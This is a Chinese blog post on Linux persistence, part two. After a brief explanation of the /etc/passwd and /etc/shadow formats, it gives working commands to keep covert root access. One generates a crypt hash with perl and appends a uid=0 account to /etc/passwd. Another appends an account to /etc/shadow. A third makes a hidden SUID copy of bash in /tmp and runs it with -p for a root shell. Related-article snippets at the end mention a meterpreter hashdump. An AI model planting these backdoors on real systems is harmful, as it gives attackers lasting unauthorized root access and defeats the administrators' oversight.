Linux权限维持(二)

最新推荐文章于 2024-05-08 13:52:39 发布
最新推荐文章于 2024-05-08 13:52:39 发布
阅读量145 收藏
点赞数 1
文章标签: linux 运维 服务器 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pingan233/article/details/129168577
版权

passwd增加用户

先讲一下passwd和shadow文件的区别:

​
/etc/passwd 各部分含义: 用户名:密码:用户ID:组ID:身份描述:用户的家目录:用户登录后所使用的SHELL
​
​
/etc/shadow 各部分含义: 用户名:密码的MD5加密值:自系统使用以来口令被修改的天数:口令的最小修改间隔:口令更改的周期:口令失效的天数:口令失效以后帐号会被锁定多少天:用户帐号到期时间:保留字段尚未使用

通常情况下,我们在进行添加账户的时候是将账户信息输入到passwd文件中:

perl -le 'print crypt("passwd","salt")'
​
sadtCr0CILzv2
# 上面是利用perl生成passwd加盐salt进行加密后的结果
​
echo "test:sadtCr0CILzv2:0:0:/root:/bin/bash">> /etc/passwd
​

然而如果系统不允许uid=0的用户远程登录,我们可以通过shadow增加一个普通用户账号:

echo "momaek:savbSWc4rx8NY:-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

SUID后门

当一个文件所属主的x标志位s(set uid简称suid)时,且所属主为root时,当执行该文件时,其实是以root身份执行的。

必要条件:

1、SUID权限仅对二进制程序有效。 
2、执行者对于该程序需要具有x的可执行权限
3、本权限仅在执行该程序的过程中有效  
4、在执行过程中执行者将具有该程序拥有者的权限

创建suid权限的文件:

$cp /bin/bash /tmp/.woot
$chmod 4755 /tmp/.woot
$ls -al /.woot

使用一般用户运行:

$/tmp/.woot 
$/tmp/.woot -p    //bash2 针对 suid 有一些护卫的措施,使用-p参数来获取一个root shell

有的师傅可能对ID的知识有些迷茫,可以参考一下这个文章来进行理解: Real user ID, effective user ID, set user ID_fatshaw的博客-CSDN博客

不会代码的靓仔关
关注
内网渗透-linux权限维持
lza20001103的博客
08-25 840
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
linux 系统中 /etc/passwd 和 /etc/shadow文件详解
热门推荐
fly小灰灰的专栏
01-19 4万+
linux操作系统中, /etc/passwd文件中的每个用户都有一个对应的记录行,记录着这个用户的一下基本属性。该文件对所有用户可读。  而/etc/shadow文件正如他的名字一样,他是passwd文件的一个影子,/etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生。但是/etc/shadow文件只有系统管理员
linux提权(部分)
E1even的博客
07-29 331
linux提权方式有很多,这里从易到难在自己电脑做个笔记,根据其他师傅的笔记在自己电脑上面复现一下 明文密码提取 基础知识: etc/passwd 储存了用户,全用户可读,root 可写。 etc/shadow 存储密码的 hash,仅 root 可读写。 这里我使用的是Centons: 查看一下etc/passwd里面存储的用户账号密码信息: passwd 由冒号分割,第一列是用户名,第列是密码,x 代表密码 hash 被放在 shadow 里面了(这样非 root 就看不到了)。而 shadow 里面
Linux常用六种提权方式
最新发布
qq_59102311的博客
05-08 3981
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。原理:SUID提权的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
Linux 权限维持手法
qq_53742230的博客
07-21 2546
Linux 权限维持手法
23.文件特殊权限之SUID权限、SGID权限、Sticky BIT权限和ACL权限
小鹏linux的博客
01-23 2595
在多用户多任务的Linux系统里,每个进程的运行都与运行的用户和组相关联。除了进程识别号(PID)以外,每个进程还有另外4个用户和用户组相关的识别号。他们分别是:实际用户识别号(RUID)、实际组识别号(RGID)、有效用 户识别号(EUID)、有效组识别号(EGID)。EUID和EGID的作用在于确定一个进程对其访问的文件的权限和优先权。一般情况下, EUID、EGID与RUID和RGID相同。设置了SUID和SGID情况除外。
linux权限维持.pdf
03-31
Linux权限维持是信息安全领域内一个关键的话题,特别是在对Linux系统进行入侵测试或实际遭受攻击后,保持对系统的访问权限是一个常见需求。以下是关于Linux权限维持的详细介绍: 首先,Linux系统权限维持的方法通常...
kali linux权限维持,msfconsole权限维持
weixin_42297742的博客
04-29 452
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
这篇速查表主要列举了多种利用SUID权限维持的方法,这些方法大多涉及通过不同的命令或者脚本启动一个shell,以获得root权限。以下是一些示例: 1. `chmod u+s program`: 这个命令将SUID权限赋予名为`program`的文件...
Linux用户文件之passwd和shadow
从菜鸟到菜菜鸟
02-01 4373
passwd文件是以行为单位的配置文件,每行定义系统上的一个用户,行内分为字段,字段之间由一个冒号隔开。这些字段依次为: 用户名:密码:用户ID:主要组ID:GECOS:主目录:登录shell 字段解释: 用户名:就是一个用户名,登录时候用的 密码:在旧的UNIX系统上,这个字段含有用户的加密密码,为了安全性,现在的linux均显示为x或*号 用户ID:linux内核用于识别用户的一个整
Linux /etc/passwd文件和Linux /etc/shadow
wo_yan_zhao的专栏
11-09 3533
Linux系统中,每个用户都具有一个唯一的身份标识,称作用户ID(简称UID)。 Linux用户可以分为3类:超级用户(root  用户标识号是0)、管理用户和普通用户。 /etc/passwd  是存放用户的地方,语法格式: name:password:uid:gid:comment:home:shell /etc/passwd 文件是一个纯文本文件,每行采用了相同的格式:
linux 用户管理之 passwd和shadow 文件的区别 -- 详细说明
星月情缘的博客
01-22 9770
              使用linux系统的人 应该都知道 linux是一个多用户,多任务的网络操作系统。那么系统如何来同时管理很多个用户呢。 这里出现新的概念就是uid和gid. 也就是用户id和组id 的文件来管理用户和用户组,这样做也是为了方便系统对于文件和用户权限的配置,防止因为误操作造成不可挽回的损失。             在linux 系统中的用户名是为了管理员方便阅读,对...
OS / linux / passwd 文件和 shadow 文件
布袋和尚
09-15 1504
现在的 Unix / Linux 系统中,口令不再直接保存在 passwd 文件中,通常将 passwd 文件中的口令字段使用一个“x”来代替,将 /etc/shadow 作为真正的口令文件,用于保存包括个人口令在内的数据。通常在 Linux 系统中,用户的关键信息被存放在系统的 /etc/passwd 文件中,系统的每一个合法用户账号对应于该文件中的一行记录。此外,需要注意的是,如果 passwd 字段中的第一个字符是“*”的话,那么,就表示该账号被查封了,系统不允许持有该账号的用户登录。
4.3. perl crypt
weixin_33866037的博客
12-21 300
perl -e 'print("userPassword: ".crypt("secret","salt")."\n");' 原文出处:Netkiller 系列 手札本文作者:陈景峯转载请与作者联系,同时请务必标明文章原始出处和作者信息及本声明。 ...
linux 给文件添加用户名和密码是什么格式,通过可写入的etcpasswd文件实现Linux提权...
weixin_29867607的博客
04-28 385
原标题:通过可写入的etcpasswd文件实现Linux提权 在红队评估期间,队员们往往会面临许多不同的场景,最为常见的场景比如只有一个普通或低级别的shell。在Windows环境中,管理员或管理员组的成员会具有较高的权限,而这些高权限用户也是攻击者的主要目标。同样,在Linux环境中root或具有sudo权限的用户也将会是攻击者的主要针对用户。本文我们将讨论有关文件配置错误导致权限提升的例子。...
linux权限维持
LainWith的博客
01-24 3111
目录修改文件/终端属性文件创建时间文件锁定历史操作命令passwd增加用户背景知识实操-增加超级用户SSH后门SSH 软连接后门SSH 公钥免密码登陆SSH Keylogger记录密码Ubuntu利用Cron机制安装后门vim python 扩展后门inetd服务后门协议后门ICMPDNS协议后门检测PAM后门参考 修改文件/终端属性 文件创建时间 如果蓝队根据文件修改时间来判断文件是否为后门,解决方法:使用 touch touch命令有两个功能:一是创建新的空文件,是改变已有文件的时间戳属性。 文
HW之红队常见Linux的几种权限维持
hackzkaq的博客
06-06 655
在红蓝对抗过程中拿到目标权限只是开始,当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。在前面几篇中,我们介绍了windows的提权及权限维持Linux提权的几种方法也进行了总结,本期我们将继续对Linux权限维持进行探究.关联阅读: Windows常见的几种提权方法、红队常见Windows的几种权限维持、红队常见Linux的几种提权方法1.1)修改文件的创建时间如果蓝队根据文件修改时间来判断文件是否为后门,如参考i
perl函数说明(crypt)
紫轩阁
06-20 2334
crypt crypt PLAINTEXT, SALT 这个函数用和 crypt(3) 完全一样的方法计算一个字串的单向散列。这个功能对于检查口令文件中是否有极烂的口令很有用,(注:只有那些具有诚实的意图的人才可以做这些事情。)尽管你真正想干的事情是防止人们在一开始就使用糟糕的口令。 crypt 是有意做成一个单向函数的,和打破鸡蛋炸煎鸡蛋一个道理。目前没有(已知)的办法解密一个加
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值